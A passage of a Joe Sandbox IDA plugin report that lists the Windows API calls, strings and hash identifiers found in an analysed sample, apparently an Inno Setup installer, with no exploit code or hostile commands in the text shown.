                                                                                                        • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                        • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                        • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                      • String ID: vLB
                                                                                                      • API String ID: 1477829881-1797516613
                                                                                                      • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                      • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                      • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                      • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                      APIs
                                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                                      • String ID: Z
                                                                                                      • API String ID: 3604996873-1505515367
                                                                                                      • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                      • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                      • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                      • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                      APIs
                                                                                                      • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$EmptyRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 182455014-2867612384
                                                                                                      • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                      • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                      • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                      • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                        • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                      • String ID: ...\
                                                                                                      • API String ID: 3133960002-983595016
                                                                                                      • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                      • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                      • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                      • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                      • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3749476976-2766056989
                                                                                                      • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                      • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                      • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                      • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$Move
                                                                                                      • String ID: isRS-%.3u.tmp
                                                                                                      • API String ID: 3839737484-3657609586
                                                                                                      • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                      • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                      • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                      • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                      • API String ID: 1220098344-2970929446
                                                                                                      • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                      • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Type$AllocByteCharFullLoadMulusermePathRegisterStringWide
                                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                      • API String ID: 1312246647-2435364021
                                                                                                      • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                      • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                      • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                      • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                      Strings
                                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                      • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                      • API String ID: 3850602802-3720027226
                                                                                                      • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                      • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                      • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                      • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • GetFocus.USER32 ref: 00478757
                                                                                                      • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                      • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                                      • String ID: Wnd=$%x
                                                                                                      • API String ID: 1381870634-2927251529
                                                                                                      • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                      • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                      • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                      • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                      APIs
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                      • API String ID: 1748579591-1013271723
                                                                                                      • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                      • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                      • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                      • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                        • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                                      • String ID: DeleteFile$MoveFile
                                                                                                      • API String ID: 3024442154-139070271
                                                                                                      • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                      • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                      • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                      • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                      • API String ID: 47109696-2631785700
                                                                                                      • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                      • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                                      • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                      • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                      Strings
                                                                                                      • CSDVersion, xrefs: 00483BFC
                                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                      • API String ID: 3677997916-1910633163
                                                                                                      • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                      • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                      • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                      • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                      • API String ID: 1646373207-4063490227
                                                                                                      • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                      • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                      • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                      • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                      • API String ID: 1646373207-260599015
                                                                                                      • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                      • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                      • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                      • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                                      • API String ID: 1646373207-597752486
                                                                                                      • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                      • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                      • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                      • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                      • API String ID: 1646373207-834958232
                                                                                                      • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                      • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                      • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                      • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
